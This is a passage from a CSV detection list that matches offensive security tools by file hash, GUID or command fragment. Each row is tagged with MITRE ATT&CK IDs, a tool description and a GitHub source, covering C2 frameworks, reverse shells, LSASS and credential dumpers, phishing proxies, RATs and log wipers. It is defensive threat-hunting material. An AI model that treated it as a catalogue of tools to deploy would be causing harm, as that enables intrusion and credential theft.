- T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6212badbf494f425f21ff4792c83e272dfa8b7c3352a993aa352e2cbe6d97106*",".{0,1000}6212badbf494f425f21ff4792c83e272dfa8b7c3352a993aa352e2cbe6d97106.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*628E42D5-AE4F-4CDD-8D14-DAB1A3697B62*",".{0,1000}628E42D5\-AE4F\-4CDD\-8D14\-DAB1A3697B62.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd*",".{0,1000}62a69abb559cbca8163cb933445bce62a2e73f5dffcf2a77e28f8f64fc1889fd.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*62ad0c68652b614acd4b82670b987719dee83f900678788bacf7cef174ea17d9*",".{0,1000}62ad0c68652b614acd4b82670b987719dee83f900678788bacf7cef174ea17d9.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*62ba281147ceeefca5bd15f58ac52125bc42b0e134a6fcb4bd90efdae0fce318*",".{0,1000}62ba281147ceeefca5bd15f58ac52125bc42b0e134a6fcb4bd90efdae0fce318.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*62bba0a6ecfaf6e8052504a2699b1ba24822f2098223ba459f83a29ec4f70cf6*",".{0,1000}62bba0a6ecfaf6e8052504a2699b1ba24822f2098223ba459f83a29ec4f70cf6.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*62d75a789031b5af31711cf4c71df20312613cfbb466ce13f11d8cbd04246872*",".{0,1000}62d75a789031b5af31711cf4c71df20312613cfbb466ce13f11d8cbd04246872.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*62db3e73826eb5cd8b14f3b54e7c476d423f28c0d4e467632fcacf338c250301*",".{0,1000}62db3e73826eb5cd8b14f3b54e7c476d423f28c0d4e467632fcacf338c250301.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*62E3CCF4-07F3-496E-B77D-48D5AC0E6260*",".{0,1000}62E3CCF4\-07F3\-496E\-B77D\-48D5AC0E6260.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*62eb5977f66221339e954ea9e4947966ad4558966264814a406b93dab8b275df*",".{0,1000}62eb5977f66221339e954ea9e4947966ad4558966264814a406b93dab8b275df.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*62f11b4ae2f0d26ed55efd4c918cfec1bd95036f507cf2dbf3295949831366ca*",".{0,1000}62f11b4ae2f0d26ed55efd4c918cfec1bd95036f507cf2dbf3295949831366ca.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*630BF262-768C-4085-89B1-9FEF7375F442*",".{0,1000}630BF262\-768C\-4085\-89B1\-9FEF7375F442.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*631cdab8f10610656a3f360d18fc7019549a68806579092a83cfdee543a38255*",".{0,1000}631cdab8f10610656a3f360d18fc7019549a68806579092a83cfdee543a38255.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*632b9ef95949f0b11919a46cdb0bf586e8a291ff7c13ce44ba0b0ba83015050d*",".{0,1000}632b9ef95949f0b11919a46cdb0bf586e8a291ff7c13ce44ba0b0ba83015050d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6334665cbd227e91e2fe4517cc5bb0e6f4163aa4ae10430e034df836287dc339*",".{0,1000}6334665cbd227e91e2fe4517cc5bb0e6f4163aa4ae10430e034df836287dc339.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*633bd0cfd64ccc0030ca38148459f71dba02cf3ce103ce24d8a0872c00a26eeb*",".{0,1000}633bd0cfd64ccc0030ca38148459f71dba02cf3ce103ce24d8a0872c00a26eeb.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*6357479243a64e0edc18f138b2f1ccce22e4396db9ecf4740b71f6185ea055f1*",".{0,1000}6357479243a64e0edc18f138b2f1ccce22e4396db9ecf4740b71f6185ea055f1.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*635cde05365898125638645ecab1f6cdb3136c06f0882c2617d2046a2e8f5f27*",".{0,1000}635cde05365898125638645ecab1f6cdb3136c06f0882c2617d2046a2e8f5f27.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*63688c4f211155c76f2948ba21ebaf83*",".{0,1000}63688c4f211155c76f2948ba21ebaf83.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*636b4e445770ac1cf66687e9a1ce57347221eeb539f14fe4b0b60f387cc41009*",".{0,1000}636b4e445770ac1cf66687e9a1ce57347221eeb539f14fe4b0b60f387cc41009.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*63794d03a5550be74cf88df14b42968a7e23a58eea0690d23fedf01f57067166*",".{0,1000}63794d03a5550be74cf88df14b42968a7e23a58eea0690d23fedf01f57067166.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*63839def4c061f214718a67dc487187d5b73288d72845c4007b5162ad57dd47b*",".{0,1000}63839def4c061f214718a67dc487187d5b73288d72845c4007b5162ad57dd47b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*638f7368dfceb394d7ad1c927ce5399386833816bd099ae41db5a249c3ff8362*",".{0,1000}638f7368dfceb394d7ad1c927ce5399386833816bd099ae41db5a249c3ff8362.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*639EF517-FCFC-408E-9500-71F0DC0458DB*",".{0,1000}639EF517\-FCFC\-408E\-9500\-71F0DC0458DB.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940*",".{0,1000}63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*63dcdf6e5eb8252ec73b58bde6249db9d38272dc6870074d2569f7431a1ab32f*",".{0,1000}63dcdf6e5eb8252ec73b58bde6249db9d38272dc6870074d2569f7431a1ab32f.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*63ef9e8f57db894995c6c89dc58c854d529b8480078b5b608cc6e75722f4c713*",".{0,1000}63ef9e8f57db894995c6c89dc58c854d529b8480078b5b608cc6e75722f4c713.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*63f5ce1c0d7cacc9f68421eb56b0640a48fd52695fefbe3589d7a2520a684123*",".{0,1000}63f5ce1c0d7cacc9f68421eb56b0640a48fd52695fefbe3589d7a2520a684123.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*63f6929cf8f9c534611dc567df4e773bc6172288d3c6edcb3f92a09e303ca8d6*",".{0,1000}63f6929cf8f9c534611dc567df4e773bc6172288d3c6edcb3f92a09e303ca8d6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*-64 -format=reflective-dll *",".{0,1000}\-64\s\-format\=reflective\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*6412cb5d528ee93be2fc08b2c72cdee6c36e38ce5064d2685139bcbf9962298f*",".{0,1000}6412cb5d528ee93be2fc08b2c72cdee6c36e38ce5064d2685139bcbf9962298f.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*641a94207f95ee2eb5cff95317e1aab73db6366fd3c2e5942bae83f0f3cb666f*",".{0,1000}641a94207f95ee2eb5cff95317e1aab73db6366fd3c2e5942bae83f0f3cb666f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*64293e56dfaad772c31a8d53e7ea876b9db7aaea29e89381684f56227952813a*",".{0,1000}64293e56dfaad772c31a8d53e7ea876b9db7aaea29e89381684f56227952813a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*643e677418a7b03b82f340efb76cdb2dad8c63dca5f14b653b0b2d89376dced5*",".{0,1000}643e677418a7b03b82f340efb76cdb2dad8c63dca5f14b653b0b2d89376dced5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*644758B1-C146-4D3B-B614-8EB6C933B0AA*",".{0,1000}644758B1\-C146\-4D3B\-B614\-8EB6C933B0AA.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","0","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*6448c50a9a80154c2f1ca5b7525ffc8822f16562b1774a54efd066fcc80620e8*",".{0,1000}6448c50a9a80154c2f1ca5b7525ffc8822f16562b1774a54efd066fcc80620e8.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*644AFE4A-2267-4DF9-A79D-B514FB31830E*",".{0,1000}644AFE4A\-2267\-4DF9\-A79D\-B514FB31830E.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*64853db4da2d13a82c795e1eb6e7e2c4efc2d673be34b5f65398f54b7277a5de*",".{0,1000}64853db4da2d13a82c795e1eb6e7e2c4efc2d673be34b5f65398f54b7277a5de.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*64d2905609b4275f692466d0aacdd3f9c7da7860e9ed6dd7047e6dbcec851d99*",".{0,1000}64d2905609b4275f692466d0aacdd3f9c7da7860e9ed6dd7047e6dbcec851d99.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*64D84D51-F462-4A24-85EA-845C97238C09*",".{0,1000}64D84D51\-F462\-4A24\-85EA\-845C97238C09.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*64e4cb3e5effc17d4b5cf14a8c8a095e9edd0b089ecd6106449bd7e95a961310*",".{0,1000}64e4cb3e5effc17d4b5cf14a8c8a095e9edd0b089ecd6106449bd7e95a961310.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*64f05121f9c950fd6146c9d91aded76884e80fc69825d80b688b113eb8271a24*",".{0,1000}64f05121f9c950fd6146c9d91aded76884e80fc69825d80b688b113eb8271a24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*651095e7885df539f9cf20ded168c9097051bc99bcaa5cb5442d21267e14317e*",".{0,1000}651095e7885df539f9cf20ded168c9097051bc99bcaa5cb5442d21267e14317e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d*",".{0,1000}6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*6522659bfa7046803bb28a749799fb9b876d656fa46037fe28709fb4ad15d115*",".{0,1000}6522659bfa7046803bb28a749799fb9b876d656fa46037fe28709fb4ad15d115.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6537990787752bff7e69cbd253886150278fe24c7aa008a74548d0f09b11d936*",".{0,1000}6537990787752bff7e69cbd253886150278fe24c7aa008a74548d0f09b11d936.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 